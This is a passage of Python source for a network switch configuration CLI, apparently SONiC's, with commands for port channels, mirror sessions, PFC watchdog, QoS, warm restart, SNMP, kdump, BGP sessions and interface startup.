config_db.mod_entry('DEVICE_METADATA' , 'localhost', {"synchronous_mode" : sync_mode})
click.echo("""Wrote %s synchronous mode into CONFIG_DB, swss restart required to apply the configuration: \n
Option 1. config save -y \n
config reload -y \n
Option 2. systemctl restart swss""" % sync_mode)
else:
raise click.BadParameter("Error: Invalid argument %s, expect either enable or disable" % sync_mode)
#
# 'portchannel' group ('config portchannel ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
# TODO add "hidden=True if this is a single ASIC platform, once we have click 7.0 in all branches.
@click.option('-n', '--namespace', help='Namespace name',
required=True if multi_asic.is_multi_asic() else False, type=click.Choice(multi_asic.get_namespace_list()))
@click.pass_context
def portchannel(ctx, namespace):
# Set namespace to default_namespace if it is None.
if namespace is None:
namespace = DEFAULT_NAMESPACE
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=str(namespace))
config_db.connect()
ctx.obj = {'db': config_db, 'namespace': str(namespace)}
@portchannel.command('add')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.option('--min-links', default=0, type=int)
@click.option('--fallback', default='false')
@click.pass_context
def add_portchannel(ctx, portchannel_name, min_links, fallback):
"""Add port channel"""
db = ctx.obj['db']
fvs = {'admin_status': 'up',
'mtu': '9100'}
if min_links != 0:
fvs['min_links'] = str(min_links)
if fallback != 'false':
fvs['fallback'] = 'true'
db.set_entry('PORTCHANNEL', portchannel_name, fvs)
@portchannel.command('del')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.pass_context
def remove_portchannel(ctx, portchannel_name):
"""Remove port channel"""
db = ctx.obj['db']
if len([(k, v) for k, v in db.get_table('PORTCHANNEL_MEMBER') if k == portchannel_name]) != 0:
click.echo("Error: Portchannel {} contains members. Remove members before deleting Portchannel!".format(portchannel_name))
else:
db.set_entry('PORTCHANNEL', portchannel_name, None)
@portchannel.group(cls=clicommon.AbbreviationGroup, name='member')
@click.pass_context
def portchannel_member(ctx):
pass
@portchannel_member.command('add')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.argument('port_name', metavar='<port_name>', required=True)
@click.pass_context
def add_portchannel_member(ctx, portchannel_name, port_name):
"""Add member to port channel"""
db = ctx.obj['db']
if clicommon.is_port_mirror_dst_port(db, port_name):
ctx.fail("{} is configured as mirror destination port".format(port_name))
# Check if the member interface given by user is valid in the namespace.
if interface_name_is_valid(db, port_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
db.set_entry('PORTCHANNEL_MEMBER', (portchannel_name, port_name),
{'NULL': 'NULL'})
@portchannel_member.command('del')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.argument('port_name', metavar='<port_name>', required=True)
@click.pass_context
def del_portchannel_member(ctx, portchannel_name, port_name):
"""Remove member from portchannel"""
db = ctx.obj['db']
# Check if the member interface given by user is valid in the namespace.
if interface_name_is_valid(db, port_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
db.set_entry('PORTCHANNEL_MEMBER', (portchannel_name, port_name), None)
db.set_entry('PORTCHANNEL_MEMBER', portchannel_name + '|' + port_name, None)
#
# 'mirror_session' group ('config mirror_session ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='mirror_session')
def mirror_session():
pass
#
# 'add' subgroup ('config mirror_session add ...')
#
@mirror_session.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('src_ip', metavar='<src_ip>', required=True)
@click.argument('dst_ip', metavar='<dst_ip>', required=True)
@click.argument('dscp', metavar='<dscp>', required=True)
@click.argument('ttl', metavar='<ttl>', required=True)
@click.argument('gre_type', metavar='[gre_type]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.option('--policer')
def add(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer):
""" Add ERSPAN mirror session.(Legacy support) """
add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer)
@mirror_session.group(cls=clicommon.AbbreviationGroup, name='erspan')
@click.pass_context
def erspan(ctx):
""" ERSPAN mirror_session """
pass
#
# 'add' subcommand
#
@erspan.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('src_ip', metavar='<src_ip>', required=True)
@click.argument('dst_ip', metavar='<dst_ip>', required=True)
@click.argument('dscp', metavar='<dscp>', required=True)
@click.argument('ttl', metavar='<ttl>', required=True)
@click.argument('gre_type', metavar='[gre_type]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.argument('src_port', metavar='[src_port]', required=False)
@click.argument('direction', metavar='[direction]', required=False)
@click.option('--policer')
def add(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port, direction):
""" Add ERSPAN mirror session """
add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port, direction)
def gather_session_info(session_info, policer, queue, src_port, direction):
if policer:
session_info['policer'] = policer
if queue:
session_info['queue'] = queue
if src_port:
if clicommon.get_interface_naming_mode() == "alias":
src_port_list = []
for port in src_port.split(","):
src_port_list.append(interface_alias_to_name(None, port))
src_port=",".join(src_port_list)
session_info['src_port'] = src_port
if not direction:
direction = "both"
session_info['direction'] = direction.upper()
return session_info
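# Example of a fully populated session_info for an ERSPAN session (illustrative values only):
# {'type': 'ERSPAN', 'src_ip': '1.1.1.1', 'dst_ip': '2.2.2.2', 'dscp': '8', 'ttl': '64',
#  'queue': '0', 'src_port': 'Ethernet0', 'direction': 'BOTH'}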
def add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port=None, direction=None):
session_info = {
"type" : "ERSPAN",
"src_ip": src_ip,
"dst_ip": dst_ip,
"dscp": dscp,
"ttl": ttl
}
if gre_type:
session_info['gre_type'] = gre_type
session_info = gather_session_info(session_info, policer, queue, src_port, direction)
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
if validate_mirror_session_config(config_db, session_name, None, src_port, direction) is False:
return
config_db.set_entry("MIRROR_SESSION", session_name, session_info)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
if validate_mirror_session_config(per_npu_configdb[front_asic_namespaces], session_name, None, src_port, direction) is False:
return
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, session_info)
@mirror_session.group(cls=clicommon.AbbreviationGroup, name='span')
@click.pass_context
def span(ctx):
""" SPAN mirror session """
pass
@span.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('dst_port', metavar='<dst_port>', required=True)
@click.argument('src_port', metavar='[src_port]', required=False)
@click.argument('direction', metavar='[direction]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.option('--policer')
def add(session_name, dst_port, src_port, direction, queue, policer):
""" Add SPAN mirror session """
add_span(session_name, dst_port, src_port, direction, queue, policer)
def add_span(session_name, dst_port, src_port, direction, queue, policer):
if clicommon.get_interface_naming_mode() == "alias":
dst_port = interface_alias_to_name(None, dst_port)
if dst_port is None:
click.echo("Error: Destination Interface {} is invalid".format(dst_port))
return
session_info = {
"type" : "SPAN",
"dst_port": dst_port,
}
session_info = gather_session_info(session_info, policer, queue, src_port, direction)
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
if validate_mirror_session_config(config_db, session_name, dst_port, src_port, direction) is False:
return
config_db.set_entry("MIRROR_SESSION", session_name, session_info)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
if validate_mirror_session_config(per_npu_configdb[front_asic_namespaces], session_name, dst_port, src_port, direction) is False:
return
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, session_info)
@mirror_session.command()
@click.argument('session_name', metavar='<session_name>', required=True)
def remove(session_name):
""" Delete mirror session """
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
config_db.set_entry("MIRROR_SESSION", session_name, None)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, None)
#
# 'pfcwd' group ('config pfcwd ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def pfcwd():
"""Configure pfc watchdog """
pass
@pfcwd.command()
@click.option('--action', '-a', type=click.Choice(['drop', 'forward', 'alert']))
@click.option('--restoration-time', '-r', type=click.IntRange(100, 60000))
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('ports', nargs=-1)
@click.argument('detection-time', type=click.IntRange(100, 5000))
def start(action, restoration_time, ports, detection_time, verbose):
"""
Start PFC watchdog on port(s). To configure all ports, use "all" as input.
Example:
config pfcwd start --action drop ports all detection-time 400 --restoration-time 400
"""
cmd = "pfcwd start"
if action:
cmd += " --action {}".format(action)
if ports:
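# Drop the literal "ports"/"detection-time" tokens in case the user typed the verbose syntax
# shown in the example above (assumption based on that invocation style).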
ports = set(ports) - set(['ports', 'detection-time'])
cmd += " ports {}".format(' '.join(ports))
if detection_time:
cmd += " detection-time {}".format(detection_time)
if restoration_time:
cmd += " --restoration-time {}".format(restoration_time)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command()
@click.option('--verbose', is_flag=True, help="Enable verbose output")
def stop(verbose):
""" Stop PFC watchdog """
cmd = "pfcwd stop"
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command()
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('poll_interval', type=click.IntRange(100, 3000))
def interval(poll_interval, verbose):
""" Set PFC watchdog counter polling interval (ms) """
cmd = "pfcwd interval {}".format(poll_interval)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('counter_poll')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('counter_poll', type=click.Choice(['enable', 'disable']))
def counter_poll(counter_poll, verbose):
""" Enable/disable counter polling """
cmd = "pfcwd counter_poll {}".format(counter_poll)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('big_red_switch')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('big_red_switch', type=click.Choice(['enable', 'disable']))
def big_red_switch(big_red_switch, verbose):
""" Enable/disable BIG_RED_SWITCH mode """
cmd = "pfcwd big_red_switch {}".format(big_red_switch)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('start_default')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
def start_default(verbose):
""" Start PFC WD by default configurations """
cmd = "pfcwd start_default"
clicommon.run_command(cmd, display_cmd=verbose)
#
# 'qos' group ('config qos ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def qos(ctx):
"""QoS-related configuration tasks"""
pass
@qos.command('clear')
def clear():
"""Clear QoS configuration"""
log.log_info("'qos clear' executing...")
_clear_qos()
@qos.command('reload')
def reload():
"""Reload QoS configuration"""
log.log_info("'qos reload' executing...")
_clear_qos()
_, hwsku_path = device_info.get_paths_to_platform_and_hwsku_dirs()
namespace_list = [DEFAULT_NAMESPACE]
if multi_asic.get_num_asics() > 1:
namespace_list = multi_asic.get_namespaces_from_linux()
for ns in namespace_list:
if ns is DEFAULT_NAMESPACE:
asic_id_suffix = ""
else:
asic_id = multi_asic.get_asic_id_from_name(ns)
if asic_id is None:
click.secho(
"Command 'qos reload' failed with invalid namespace '{}'".
format(ns),
fg="yellow"
)
raise click.Abort()
asic_id_suffix = str(asic_id)
buffer_template_file = os.path.join(hwsku_path, asic_id_suffix, "buffers.json.j2")
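# e.g. <hwsku_path>/buffers.json.j2 on single-ASIC, or <hwsku_path>/<asic_id>/buffers.json.j2 per ASIC (illustrative).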
if os.path.isfile(buffer_template_file):
qos_template_file = os.path.join(hwsku_path, asic_id_suffix, "qos.json.j2")
if os.path.isfile(qos_template_file):
cmd_ns = "" if ns is DEFAULT_NAMESPACE else "-n {}".format(ns)
sonic_version_file = os.path.join('/', "etc", "sonic", "sonic_version.yml")
command = "{} {} -d -t {},config-db -t {},config-db -y {} --write-to-db".format(
SONIC_CFGGEN_PATH,
cmd_ns,
buffer_template_file,
qos_template_file,
sonic_version_file
)
# Apply the configurations only when both buffer and qos
# configuration files are present
clicommon.run_command(command, display_cmd=True)
else:
click.secho("QoS definition template not found at {}".format(
qos_template_file
), fg="yellow")
else:
click.secho("Buffer definition template not found at {}".format(
buffer_template_file
), fg="yellow")
#
# 'warm_restart' group ('config warm_restart ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='warm_restart')
@click.pass_context
@click.option('-s', '--redis-unix-socket-path', help='unix socket path for redis connection')
def warm_restart(ctx, redis_unix_socket_path):
"""warm_restart-related configuration tasks"""
kwargs = {}
if redis_unix_socket_path:
kwargs['unix_socket_path'] = redis_unix_socket_path
config_db = ConfigDBConnector(**kwargs)
config_db.connect(wait_for_init=False)
# warm restart enable/disable config is put in stateDB, not persistent across cold reboot, not saved to config_DB.json file
state_db = SonicV2Connector(host='127.0.0.1')
state_db.connect(state_db.STATE_DB, False)
TABLE_NAME_SEPARATOR = '|'
prefix = 'WARM_RESTART_ENABLE_TABLE' + TABLE_NAME_SEPARATOR
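# e.g. enabling warm restart for "swss" writes STATE_DB key "WARM_RESTART_ENABLE_TABLE|swss" with enable=true (illustrative).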
ctx.obj = {'db': config_db, 'state_db': state_db, 'prefix': prefix}
@warm_restart.command('enable')
@click.argument('module', metavar='<module>', default='system', required=False, type=click.Choice(["system", "swss", "bgp", "teamd"]))
@click.pass_context
def warm_restart_enable(ctx, module):
state_db = ctx.obj['state_db']
prefix = ctx.obj['prefix']
_hash = '{}{}'.format(prefix, module)
state_db.set(state_db.STATE_DB, _hash, 'enable', 'true')
state_db.close(state_db.STATE_DB)
@warm_restart.command('disable')
@click.argument('module', metavar='<module>', default='system', required=False, type=click.Choice(["system", "swss", "bgp", "teamd"]))
@click.pass_context
def warm_restart_disable(ctx, module):
state_db = ctx.obj['state_db']
prefix = ctx.obj['prefix']
_hash = '{}{}'.format(prefix, module)
state_db.set(state_db.STATE_DB, _hash, 'enable', 'false')
state_db.close(state_db.STATE_DB)
@warm_restart.command('neighsyncd_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_neighsyncd_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1, 10000):
ctx.fail("neighsyncd warm restart timer must be in range 1-9999")
db.mod_entry('WARM_RESTART', 'swss', {'neighsyncd_timer': seconds})
@warm_restart.command('bgp_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_bgp_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1, 3601):
ctx.fail("bgp warm restart timer must be in range 1-3600")
db.mod_entry('WARM_RESTART', 'bgp', {'bgp_timer': seconds})
@warm_restart.command('teamsyncd_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_teamsyncd_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1, 3601):
ctx.fail("teamsyncd warm restart timer must be in range 1-3600")
db.mod_entry('WARM_RESTART', 'teamd', {'teamsyncd_timer': seconds})
@warm_restart.command('bgp_eoiu')
@click.argument('enable', metavar='<enable>', default='true', required=False, type=click.Choice(["true", "false"]))
@click.pass_context
def warm_restart_bgp_eoiu(ctx, enable):
db = ctx.obj['db']
db.mod_entry('WARM_RESTART', 'bgp', {'bgp_eoiu': enable})
def mvrf_restart_services():
"""Restart interfaces-config service and NTP service when mvrf is changed"""
"""
When mvrf is enabled, eth0 should be moved to mvrf; when it is disabled,
move it back to default vrf. Restarting the "interfaces-config" service
will recreate the /etc/network/interfaces file and restart the
"networking" service that takes care of the eth0 movement.
NTP service should also be restarted to rerun the NTP service with or
without "cgexec" accordingly.
"""
cmd="service ntp stop"
os.system (cmd)
cmd="systemctl restart interfaces-config"
os.system (cmd)
cmd="service ntp start"
os.system (cmd)
def vrf_add_management_vrf(config_db):
"""Enable management vrf in config DB"""
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if entry and entry['mgmtVrfEnabled'] == 'true' :
click.echo("ManagementVRF is already Enabled.")
return None
config_db.mod_entry('MGMT_VRF_CONFIG',"vrf_global",{"mgmtVrfEnabled": "true"})
mvrf_restart_services()
def vrf_delete_management_vrf(config_db):
"""Disable management vrf in config DB"""
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if not entry or entry['mgmtVrfEnabled'] == 'false' :
click.echo("ManagementVRF is already Disabled.")
return None
config_db.mod_entry('MGMT_VRF_CONFIG',"vrf_global",{"mgmtVrfEnabled": "false"})
mvrf_restart_services()
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def snmpagentaddress(ctx):
"""SNMP agent listening IP address, port, vrf configuration"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@snmpagentaddress.command('add')
@click.argument('agentip', metavar='<SNMP AGENT LISTENING IP Address>', required=True)
@click.option('-p', '--port', help="SNMP AGENT LISTENING PORT")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None")
@click.pass_context
def add_snmp_agent_address(ctx, agentip, port, vrf):
"""Add the SNMP agent listening IP:Port%Vrf configuration"""
#Construct SNMP_AGENT_ADDRESS_CONFIG table key in the format ip|<port>|<vrf>
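# e.g. "10.100.1.1|161|mgmt"; the separators remain even when port/vrf are omitted, e.g. "10.100.1.1||" (illustrative values).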
key = agentip+'|'
if port:
key = key+port
key = key+'|'
if vrf:
key = key+vrf
config_db = ctx.obj['db']
config_db.set_entry('SNMP_AGENT_ADDRESS_CONFIG', key, {})
#Restarting the SNMP service will regenerate snmpd.conf and rerun snmpd
cmd="systemctl restart snmp"
os.system (cmd)
@snmpagentaddress.command('del')
@click.argument('agentip', metavar='<SNMP AGENT LISTENING IP Address>', required=True)
@click.option('-p', '--port', help="SNMP AGENT LISTENING PORT")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None")
@click.pass_context
def del_snmp_agent_address(ctx, agentip, port, vrf):
"""Delete the SNMP agent listening IP:Port%Vrf configuration"""
key = agentip+'|'
if port:
key = key+port
key = key+'|'
if vrf:
key = key+vrf
config_db = ctx.obj['db']
config_db.set_entry('SNMP_AGENT_ADDRESS_CONFIG', key, None)
cmd="systemctl restart snmp"
os.system (cmd)
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def snmptrap(ctx):
"""SNMP Trap server configuration to send traps"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@snmptrap.command('modify')
@click.argument('ver', metavar='<SNMP Version>', type=click.Choice(['1', '2', '3']), required=True)
@click.argument('serverip', metavar='<SNMP TRAP SERVER IP Address>', required=True)
@click.option('-p', '--port', help="SNMP Trap Server port, default 162", default="162")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None", default="None")
@click.option('-c', '--comm', help="Community", default="public")
@click.pass_context
def modify_snmptrap_server(ctx, ver, serverip, port, vrf, comm):
"""Modify the SNMP Trap server configuration"""
#SNMP_TRAP_CONFIG for each SNMP version
config_db = ctx.obj['db']
if ver == "1":
#By default, v1TrapDest value in snmp.yml is "NotConfigured". Modify it.
config_db.mod_entry('SNMP_TRAP_CONFIG',"v1TrapDest",{"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
elif ver == "2":
config_db.mod_entry('SNMP_TRAP_CONFIG',"v2TrapDest",{"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
else:
config_db.mod_entry('SNMP_TRAP_CONFIG',"v3TrapDest",{"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
cmd="systemctl restart snmp"
os.system (cmd)
@snmptrap.command('del')
@click.argument('ver', metavar='<SNMP Version>', type=click.Choice(['1', '2', '3']), required=True)
@click.pass_context
def delete_snmptrap_server(ctx, ver):
"""Delete the SNMP Trap server configuration"""
config_db = ctx.obj['db']
if ver == "1":
config_db.mod_entry('SNMP_TRAP_CONFIG',"v1TrapDest",None)
elif ver == "2":
config_db.mod_entry('SNMP_TRAP_CONFIG',"v2TrapDest",None)
else:
config_db.mod_entry('SNMP_TRAP_CONFIG',"v3TrapDest",None)
cmd="systemctl restart snmp"
os.system (cmd)
#
# 'bgp' group ('config bgp ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def bgp():
"""BGP-related configuration tasks"""
pass
#
# 'shutdown' subgroup ('config bgp shutdown ...')
#
@bgp.group(cls=clicommon.AbbreviationGroup)
def shutdown():
"""Shut down BGP session(s)"""
pass
@config.group(cls=clicommon.AbbreviationGroup)
def kdump():
""" Configure kdump """
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
@kdump.command()
def disable():
"""Disable kdump operation"""
config_db = ConfigDBConnector()
if config_db is not None:
config_db.connect()
config_db.mod_entry("KDUMP", "config", {"enabled": "false"})
clicommon.run_command("sonic-kdump-config --disable")
@kdump.command()
def enable():
"""Enable kdump operation"""
config_db = ConfigDBConnector()
if config_db is not None:
config_db.connect()
config_db.mod_entry("KDUMP", "config", {"enabled": "true"})
clicommon.run_command("sonic-kdump-config --enable")
@kdump.command()
@click.argument('kdump_memory', metavar='<kdump_memory>', required=True)
def memory(kdump_memory):
"""Set memory allocated for kdump capture kernel"""
config_db = ConfigDBConnector()
if config_db is not None:
config_db.connect()
config_db.mod_entry("KDUMP", "config", {"memory": kdump_memory})
clicommon.run_command("sonic-kdump-config --memory %s" % kdump_memory)
@kdump.command('num-dumps')
@click.argument('kdump_num_dumps', metavar='<kdump_num_dumps>', required=True, type=int)
def num_dumps(kdump_num_dumps):
"""Set max number of dump files for kdump"""
config_db = ConfigDBConnector()
if config_db is not None:
config_db.connect()
config_db.mod_entry("KDUMP", "config", {"num_dumps": kdump_num_dumps})
clicommon.run_command("sonic-kdump-config --num_dumps %d" % kdump_num_dumps)
# 'all' subcommand
@shutdown.command()
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def all(verbose):
"""Shut down all BGP sessions
On multi-ASIC platforms, only the eBGP sessions with external neighbors are shut down.
"""
log.log_info("'bgp shutdown all' executing...")
namespaces = [DEFAULT_NAMESPACE]
ignore_local_hosts = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns']
ignore_local_hosts = True
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi-ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
bgp_neighbor_ip_list = _get_all_neighbor_ipaddresses(config_db, ignore_local_hosts)
for ipaddress in bgp_neighbor_ip_list:
_change_bgp_session_status_by_addr(config_db, ipaddress, 'down', verbose)
# 'neighbor' subcommand
@shutdown.command()
@click.argument('ipaddr_or_hostname', metavar='<ipaddr_or_hostname>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def neighbor(ipaddr_or_hostname, verbose):
"""Shut down BGP session by neighbor IP address or hostname.
The user can specify either an internal or an external BGP neighbor to shut down
"""
log.log_info("'bgp shutdown neighbor {}' executing...".format(ipaddr_or_hostname))
namespaces = [DEFAULT_NAMESPACE]
found_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi-ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _change_bgp_session_status(config_db, ipaddr_or_hostname, 'down', verbose):
found_neighbor = True
if not found_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(ipaddr_or_hostname))
@bgp.group(cls=clicommon.AbbreviationGroup)
def startup():
"""Start up BGP session(s)"""
pass
# 'all' subcommand
@startup.command()
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def all(verbose):
"""Start up all BGP sessions
On multi-ASIC platforms, only the eBGP sessions with external neighbors are started up.
"""
log.log_info("'bgp startup all' executing...")
namespaces = [DEFAULT_NAMESPACE]
ignore_local_hosts = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns']
ignore_local_hosts = True
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi-ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
bgp_neighbor_ip_list = _get_all_neighbor_ipaddresses(config_db, ignore_local_hosts)
for ipaddress in bgp_neighbor_ip_list:
_change_bgp_session_status_by_addr(config_db, ipaddress, 'up', verbose)
# 'neighbor' subcommand
@startup.command()
@click.argument('ipaddr_or_hostname', metavar='<ipaddr_or_hostname>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def neighbor(ipaddr_or_hostname, verbose):
log.log_info("'bgp startup neighbor {}' executing...".format(ipaddr_or_hostname))
"""Start up BGP session by neighbor IP address or hostname.
User can specify either internal or external BGP neighbor to startup
"""
namespaces = [DEFAULT_NAMESPACE]
found_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi-ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _change_bgp_session_status(config_db, ipaddr_or_hostname, 'up', verbose):
found_neighbor = True
if not found_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(ipaddr_or_hostname))
#
# 'remove' subgroup ('config bgp remove ...')
#
@bgp.group(cls=clicommon.AbbreviationGroup)
def remove():
"Remove BGP neighbor configuration from the device"
pass
@remove.command('neighbor')
@click.argument('neighbor_ip_or_hostname', metavar='<neighbor_ip_or_hostname>', required=True)
def remove_neighbor(neighbor_ip_or_hostname):
"""Deletes BGP neighbor configuration of given hostname or ip from devices
User can specify either internal or external BGP neighbor to remove
"""
namespaces = [DEFAULT_NAMESPACE]
removed_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi-ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _remove_bgp_neighbor_config(config_db, neighbor_ip_or_hostname):
removed_neighbor = True
if not removed_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(neighbor_ip_or_hostname))
#
# 'interface' group ('config interface ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
# TODO add "hidden=True if this is a single ASIC platform, once we have click 7.0 in all branches.
@click.option('-n', '--namespace', help='Namespace name',
required=True if multi_asic.is_multi_asic() else False, type=click.Choice(multi_asic.get_namespace_list()))
@click.pass_context
def interface(ctx, namespace):
"""Interface-related configuration tasks"""
# Set namespace to default_namespace if it is None.
if namespace is None:
namespace = DEFAULT_NAMESPACE
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=str(namespace))
config_db.connect()
ctx.obj = {'config_db': config_db, 'namespace': str(namespace)}
#
# 'startup' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def startup(ctx, interface_name):
"""Start up interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
intf_fs = parse_interface_in_filter(interface_name)
if len(intf_fs) > 1 and multi_asic.is_multi_asic():
ctx.fail("Interface range not supported in multi-asic platforms !!")
if len(intf_fs) == 1 and interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
log.log_info("'interface startup {}' executing...".format(interface_name))
port_dict = config_db.get_table('PORT')
for port_name in port_dict.keys():
if port_name in intf_fs:
config_db.mod_entry("PORT", port_name, {"admin_status": "up"})
portchannel_list = config_db.get_table("PORTCHANNEL")
for po_name in portchannel_list.keys():
if po_name in intf_fs:
config_db.mod_entry("PORTCHANNEL", po_name, {"admin_status": "up"})
subport_list = config_db.get_table("VLAN_SUB_INTERFACE")
for sp_name in subport_list.keys():
if sp_name in intf_fs:
config_db.mod_entry("VLAN_SUB_INTERFACE", sp_name, {"admin_status": "up"})
#
# 'shutdown' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def shutdown(ctx, interface_name):
"""Shut down interface"""
log.log_info("'interface shutdown {}' executing...".format(interface_name))
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
